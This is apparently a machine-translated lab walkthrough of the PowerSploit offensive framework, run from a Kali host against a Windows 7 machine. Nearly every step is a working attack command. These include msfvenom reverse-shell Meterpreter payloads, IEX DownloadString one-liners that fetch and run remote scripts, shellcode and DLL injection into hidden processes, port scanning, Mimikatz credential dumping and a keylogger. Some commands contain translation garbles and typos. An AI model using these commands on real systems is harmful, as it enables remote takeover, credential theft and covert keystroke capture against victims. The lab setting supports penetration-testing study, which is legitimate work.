surroundings
times (192.168.188.128)
win7 (192.168.188.148)
premise
1. Enter the git command to install the PowerSploit
command: git clone https://github.com/PowerShellMafia/PowerSploit
demo:
2. Enter the following command to start the Apache service
Command: service apache2 start
Demo:
3. Move the downloaded folder to the var/www/html directory to build a simple server
Introduce the functions of PowerSploit modules
1. AntivirusBypass: discover the antivirus features of antivirus software.
2. CodeExecution: execute code on the target host.
3. Exfiltration: an information collection tool on the target host.
4. Mayhem: blue screen and other destructive scripts.
5. Persistence: backdoor scripts (persistence). Control)
6. Recon: Use the target host as a springboard for intranet information investigation
ScriptModification: Create or modify scripts on the target host
Start actual combat
一.Invoke-Shellcode
The Invoke-Shellcode script under the CodeExecution module is often used to insert ShellCode into the specified process ID or local PowerShell. Here are two commonly used rebound Meterpreter Shell methods
1. Directly execute ShellCode to rebound Meterpreter Shell
1. Use the reverse_https module to rebound in MSF , The setting content is as follows
Command: 1.use exploit/multi/handler
2.set payload windows/meterpreter/reverse_tcp
demo:
successfully set up monitoring
2. Use msfvenom command to generate a PowerShell script Trojan
command: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.188.128 LPORT=4444 -f powershell -o /var/www/html/code
Demonstration:
Successfully generate PowerShell script Trojan (Note: Be sure to pay attention to the number of bits here, otherwise the rebound will not succeed)
3. Under the target machine PowerShell Enter the following command to download the script (run as an administrator)
command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
Demo:
4 . Then enter the following command to download the Trojan
Command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/code")
Demo:
5. Then run the Trojan under PowerShell, enter the following command
Command: Invoke-Shellcode -Shellcode ($buf) -Force
demo:
6. Return to msf to run
Successfully rebound shell
2. Inject ShellCode into the specified process to rebound Meterpreter Shell
1. Enter the following command under the target machine PowerShell to download the PowerShell script
command: IEX(New-Object Net.Client).DownloadString("http://192.168.188.128/PowerSploit/ CodeExEcution/Invoke-Shellcode.ps1")
IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/code")
2. Enter Get-Process command or ps command to view the current process
3. Then enter the following command to create a new process, start a notepad here, and set it as a hidden
command: Start-Processc:\Windows\system32\notepad.exe -WindowStyle Hidden
can see that an ID of 3816 is generated , The process named notepad
4. Then enter the following command, use the Invoke-Shellcode script to inject the process
command: Invoke-Shellcode -ProcessID 3816 -Shellcode($buf) -Force
5. Return to msf to find success and
successful rebound shell
二.Invoke-DllInjection
The following uses another script Invoke-DLLInjection under the Code Execution module, which is a DLL injection script
. 1. Similarly, download the script
command first : IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128 /PowerSploit/CodeExecution/Invoke-DllInjection.ps1”)
Download successfully
2. Use the following command to generate a DLL injection script in Kali
Command: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.188.128 lport=4444 -f dll -o /var/www/html/test.dll is
successfully generated DLL injection script
3. After uploading the generated test.dll to the C drive of the target server, you can start a new process for DLL injection, which can make the injection more hidden. Use the following command to create a new hidden notepad.exe Process
Note: Upload to the target server C drive, I download it directly from the web page
Command: Start-Processc:\Windows\system32\notepad.exe -WindowStyle Hidden
successfully generates a new process 4268
4. Use the following command to inject the
command: Invoke-DllInjection- ProcessID 4268 -Dll c:\test.dll
5. Return to msf to view and you can successfully rebound the shell
三.Invoke-Portscan
Invoke-Portscan is a script under the Recon module. It is mainly used for port scanning and is relatively simple to use.
1. Still download the script
command first : IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128 /PowerSploit/Recon/Invoke-Portscan.ps1")
2. Use the following command to scan
Command: Invoke-Portscan -Hosts 192.168.188.148,192.168.188.128 -Ports "80,22,3389"
scan successfully
四.Invoke-Mimikatz
Invoke-Mimikatz is a script under the Exfilration module, its function is to grab Hash
1. Still first download the script
command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/ExfiLtration /Invoke-Mimikatz.ps1”)
2. Execute the following command
Command: Invoke-Mimikatz -DumpCreds
successfully fetched Hash
五.Get-Keystrokes
Get-Keystrokes is a script that is Exfiltration module for keyloggers, quite powerful, not only the key logger, and can even record mouse clicks, but also a detailed record of the time, directly into the background when running real
1 . Still download the script first
Command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/Exfiltration/Get-Keystrokes.ps1")
2. Use the following command to turn on keystrokes, enter here "Hello" to simply test the
command: Get-Keystrokes -LogPath c:\test1.txt
successfully recorded, but I don’t know why there are so many duplicates.
A more successful end